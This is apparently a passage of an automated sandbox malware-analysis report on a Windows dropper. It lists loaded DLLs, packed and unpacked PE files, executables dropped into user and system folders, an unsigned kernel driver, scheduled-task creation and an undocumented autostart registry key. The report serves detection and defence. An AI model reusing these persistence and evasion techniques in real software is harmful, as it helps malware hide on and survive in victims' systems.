                Source: C:\Users\user\Documents\l0tiFM.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeSection loaded: twext.dllJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeSection loaded: cscui.dllJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeSection loaded: workfoldersshell.dllJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeSection loaded: ntshrui.dllJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeSection loaded: cscapi.dllJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeSection loaded: twinapi.appcore.dllJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeSection loaded: wtsapi32.dllJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeSection loaded: starttiledata.dllJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeSection loaded: usermgrcli.dllJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeSection loaded: usermgrproxy.dllJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeSection loaded: acppage.dllJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeSection loaded: msi.dllJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeSection loaded: aepic.dllJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeSection loaded: pcacli.dllJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeSection loaded: tbcore3u.dllJump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeSection loaded: xmllite.dllJump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeSection loaded: msv1_0.dllJump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeSection loaded: ntlmshared.dllJump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeSection loaded: cryptdll.dllJump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeSection loaded: devenum.dllJump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeSection loaded: devobj.dllJump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeSection loaded: msdmo.dllJump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeSection loaded: avicap32.dllJump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeSection loaded: msvfw32.dllJump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeSection loaded: kernel.appcore.dll
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeSection loaded: uxtheme.dll
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeSection loaded: tbcore3u.dll
                Source: C:\Program Files (x86)\3q7mMte5\Rpe5Ig0.exeSection loaded: apphelp.dll
                Source: C:\Program Files (x86)\3q7mMte5\Rpe5Ig0.exeSection loaded: kernel.appcore.dll
                Source: C:\Program Files (x86)\3q7mMte5\Rpe5Ig0.exeSection loaded: uxtheme.dll
                Source: C:\Program Files (x86)\3q7mMte5\Rpe5Ig0.exeSection loaded: tbcore3u.dll
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeSection loaded: kernel.appcore.dll
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeSection loaded: uxtheme.dll
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeSection loaded: tbcore3u.dll
                Source: C:\ProgramData\53jGFr5v.exeSection loaded: apphelp.dll
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: netapi32.dll
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: oledlg.dll
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: olepro32.dll
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: urlmon.dll
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: version.dll
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: wininet.dll
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: winmm.dll
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: iertutil.dll
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: srvcli.dll
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: netutils.dll
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: uxtheme.dll
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: kernel.appcore.dll
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: windows.storage.dll
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: wldp.dll
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: propsys.dll
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: profapi.dll
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: textinputframework.dll
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: coreuicomponents.dll
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: coremessaging.dll
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: ntmarta.dll
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: wintypes.dll
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: wintypes.dll
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: wintypes.dll
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: taskschd.dll
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: sspicli.dll
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: xmllite.dll
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: winhttp.dll
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: mswsock.dll
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: iphlpapi.dll
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: winnsi.dll
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: dpapi.dll
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: msasn1.dll
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: cryptsp.dll
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: rsaenh.dll
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: cryptbase.dll
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: gpapi.dll
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: dnsapi.dll
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: rasadhlp.dll
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: fwpuclnt.dll
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: schannel.dll
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: mskeyprotect.dll
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: ntasn1.dll
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: ncrypt.dll
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: ncryptsslp.dll
                Source: C:\Program Files (x86)\3q7mMte5\Rpe5Ig0.exeSection loaded: kernel.appcore.dll
                Source: C:\Program Files (x86)\3q7mMte5\Rpe5Ig0.exeSection loaded: uxtheme.dll
                Source: C:\Program Files (x86)\3q7mMte5\Rpe5Ig0.exeSection loaded: tbcore3u.dll
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeSection loaded: kernel.appcore.dll
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeSection loaded: uxtheme.dll
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeSection loaded: tbcore3u.dll
                Source: C:\ProgramData\atBs3ba9\d0oKoK2T.exeSection loaded: apphelp.dll
                Source: C:\ProgramData\atBs3ba9\d0oKoK2T.exeSection loaded: wininet.dll
                Source: C:\ProgramData\atBs3ba9\d0oKoK2T.exeSection loaded: cryptbase.dll
                Source: C:\ProgramData\atBs3ba9\d0oKoK2T.exeSection loaded: ??????.dll
                Source: C:\ProgramData\atBs3ba9\d0oKoK2T.exeSection loaded: ????l.dll
                Source: C:\ProgramData\atBs3ba9\d0oKoK2T.exeSection loaded: powrprof.dll
                Source: C:\ProgramData\atBs3ba9\d0oKoK2T.exeSection loaded: umpdc.dll
                Source: C:\ProgramData\atBs3ba9\d0oKoK2T.exeSection loaded: uxtheme.dll
                Source: C:\ProgramData\atBs3ba9\d0oKoK2T.exeSection loaded: mswsock.dll
                Source: C:\ProgramData\atBs3ba9\d0oKoK2T.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\2976587-987347589.07.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeFile written: C:\Users\Public\Music\destopbak.iniJump to behavior
                Source: 2976587-987347589.07.exeStatic PE information: Image base 0x140000000 > 0x60000000
                Source: 2976587-987347589.07.exeStatic file information: File size 30887936 > 1048576
                Source: 2976587-987347589.07.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x1d58200
                Source: 2976587-987347589.07.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: 2976587-987347589.07.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: 2976587-987347589.07.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: 2976587-987347589.07.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: 2976587-987347589.07.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: 2976587-987347589.07.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: 2976587-987347589.07.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: BootstrapPackagedGame-Win64-Shipping.pdb source: 2976587-987347589.07.exe
                Source: Binary string: d:\work\iGiveButton\toolbar4\Release_bin\uninstall.pdb source: l0tiFM.exe, 00000007.00000003.2330226957.0000000003D32000.00000004.00000020.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000000.2572435110.0000000000E98000.00000002.00000001.01000000.0000000A.sdmp, DfP1K3.exe, 0000002A.00000002.3349223878.0000000000E98000.00000002.00000001.01000000.0000000A.sdmp, DfP1K3.exe, 0000002A.00000002.3348166976.0000000000A7E000.00000004.00000020.00020000.00000000.sdmp, DfP1K3.exe, 0000002B.00000002.2616189489.0000000000E98000.00000002.00000001.01000000.0000000A.sdmp, DfP1K3.exe, 0000002B.00000000.2599264601.0000000000E98000.00000002.00000001.01000000.0000000A.sdmp, Rpe5Ig0.exe, 0000002C.00000002.2617538274.0000000000848000.00000002.00000001.01000000.0000000C.sdmp, Rpe5Ig0.exe, 0000002C.00000000.2603212393.0000000000848000.00000002.00000001.01000000.0000000C.sdmp, DfP1K3.exe, 0000002F.00000000.2618205476.0000000000E98000.00000002.00000001.01000000.0000000A.sdmp, DfP1K3.exe, 0000002F.00000002.2626427555.0000000000E98000.00000002.00000001.01000000.0000000A.sdmp, Rpe5Ig0.exe, 00000032.00000000.2963141398.0000000000848000.00000002.00000001.01000000.0000000C.sdmp, Rpe5Ig0.exe, 00000032.00000002.2970406917.0000000000848000.00000002.00000001.01000000.0000000C.sdmp, DfP1K3.exe, 00000033.00000002.2976452072.0000000000E98000.00000002.00000001.01000000.0000000A.sdmp, DfP1K3.exe, 00000033.00000000.2969401115.0000000000E98000.00000002.00000001.01000000.0000000A.sdmp
                Source: Binary string: c:\tools_git_priv\truesight\driver\objfre_win7_amd64\amd64\TrueSight.pdb source: 189atohci.sys.0.dr
                Source: Binary string: y:\avsdk5\engine\make\build\public\64-bit\vseamps.pdb source: l0tiFM.exe, 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmp, l0tiFM.exe, 00000006.00000000.2094593290.0000000140014000.00000002.00000001.01000000.00000008.sdmp, l0tiFM.exe, 00000007.00000000.2117625090.0000000140014000.00000002.00000001.01000000.00000008.sdmp, l0tiFM.exe.0.dr
                Source: 2976587-987347589.07.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: 2976587-987347589.07.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: 2976587-987347589.07.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: 2976587-987347589.07.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: 2976587-987347589.07.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                Data Obfuscation

                barindex
                Detected unpacking (creates a PE file in dynamic memory)
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeUnpacked PE file: 42.2.DfP1K3.exe.2820000.3.unpack
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeUnpacked PE file: 42.2.DfP1K3.exe.2880000.4.unpack
                Source: C:\Users\user\Documents\l0tiFM.exeCode function: 6_2_000000014000F000 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,6_2_000000014000F000
                Source: initial sampleStatic PE information: section where entry point is pointing to: .mo:
                Source: d0oKoK2T.exe.49.drStatic PE information: real checksum: 0x0 should be: 0xa3e57
                Source: vselog.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x23f50
                Source: tbcore3U.dll.42.drStatic PE information: real checksum: 0x0 should be: 0x4b109b
                Source: tbcore3U.dll.7.drStatic PE information: real checksum: 0x0 should be: 0x4b0d33
                Source: lBoqoqIC.exe.42.drStatic PE information: real checksum: 0x82c43 should be: 0x80580
                Source: 53jGFr5v.exe.42.drStatic PE information: real checksum: 0x0 should be: 0x184de2
                Source: tbcore3U.dll.7.drStatic PE information: section name: .%?.
                Source: tbcore3U.dll.7.drStatic PE information: section name: .%-[
                Source: tbcore3U.dll.7.drStatic PE information: section name: .mo:
                Source: 53jGFr5v.exe.42.drStatic PE information: section name: .1Q[
                Source: 53jGFr5v.exe.42.drStatic PE information: section name: .),E
                Source: 53jGFr5v.exe.42.drStatic PE information: section name: .sc=
                Source: tbcore3U.dll.42.drStatic PE information: section name: .%?.
                Source: tbcore3U.dll.42.drStatic PE information: section name: .%-[
                Source: tbcore3U.dll.42.drStatic PE information: section name: .mo:
                Source: C:\Program Files (x86)\3q7mMte5\Rpe5Ig0.exeCode function: 44_2_00842691 push ecx; ret 44_2_008426A4
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_005AE037 push esp; retf EBF3h48_2_005AE29C
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_004AD31D push ecx; ret 48_2_004AD426
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_004744FA push edx; retf 48_2_00474581
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_00478604 push FFFFFFEEh; ret 48_2_0047860B
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_00474A42 push ds; ret 48_2_00474A79
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_00474A50 push ds; ret 48_2_00474A79
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_00477C14 pushfd ; retf 48_2_00477C15
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_00479D21 pushfd ; retf 48_2_00479D22
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_00477EB8 push 00000069h; ret 48_2_00477EC0
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_00477F0D push ebx; iretd 48_2_00477F0E
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_004AEF44 push eax; ret 49_2_004AEF62
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_004AF620 push eax; ret 49_2_004AF64E
                Source: 53jGFr5v.exe.42.drStatic PE information: section name: .sc= entropy: 7.9046738678249024
                Source: initial sampleStatic PE information: section name: UPX0
                Source: initial sampleStatic PE information: section name: UPX1
                Source: initial sampleStatic PE information: section name: UPX0
                Source: initial sampleStatic PE information: section name: UPX1

                Persistence and Installation Behavior

                barindex
                Drops PE files to the document folder of the user
                Source: C:\Users\user\Desktop\2976587-987347589.07.exeFile created: C:\Users\user\Documents\l0tiFM.exeJump to dropped file
                Source: C:\Users\user\Desktop\2976587-987347589.07.exeFile created: C:\Users\user\Documents\vselog.dllJump to dropped file
                Sample is not signed and drops a device driver
                Source: C:\Users\user\Desktop\2976587-987347589.07.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to behavior
                Uses cmd line tools excessively to alter registry or file data
                Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
                Source: C:\Users\user\Desktop\2976587-987347589.07.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to dropped file
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeFile created: C:\Program Files (x86)\3q7mMte5\Rpe5Ig0.exeJump to dropped file
                Source: C:\Users\user\Documents\l0tiFM.exeFile created: C:\Program Files (x86)\DfP1K3\DfP1K3.exeJump to dropped file
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeFile created: C:\Program Files (x86)\3q7mMte5\tbcore3U.dllJump to dropped file
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeFile created: C:\ProgramData\53jGFr5v.exeJump to dropped file
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeFile created: C:\ProgramData\efk2JUeS\lBoqoqIC.exeJump to dropped file
                Source: C:\Users\user\Desktop\2976587-987347589.07.exeFile created: C:\Users\user\Documents\l0tiFM.exeJump to dropped file
                Source: C:\Users\user\Desktop\2976587-987347589.07.exeFile created: C:\Users\user\Documents\vselog.dllJump to dropped file
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeFile created: C:\ProgramData\atBs3ba9\d0oKoK2T.exeJump to dropped file
                Source: C:\Users\user\Documents\l0tiFM.exeFile created: C:\Program Files (x86)\DfP1K3\tbcore3U.dllJump to dropped file
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeFile created: C:\ProgramData\53jGFr5v.exeJump to dropped file
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeFile created: C:\ProgramData\efk2JUeS\lBoqoqIC.exeJump to dropped file
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeFile created: C:\ProgramData\atBs3ba9\d0oKoK2T.exeJump to dropped file
                Source: C:\Users\user\Desktop\2976587-987347589.07.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to dropped file

                Boot Survival

                barindex
                Creates an undocumented autostart registry key
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeKey value created or modified: HKEY_CURRENT_USER\System\CurrentControlSet\Services\Sauron GroupfenzhuJump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeKey value created or modified: HKEY_CURRENT_USER\System\CurrentControlSet\Services\Sauron GroupfenzhuJump to behavior
                Uses schtasks.exe or at.exe to add and modify task schedules
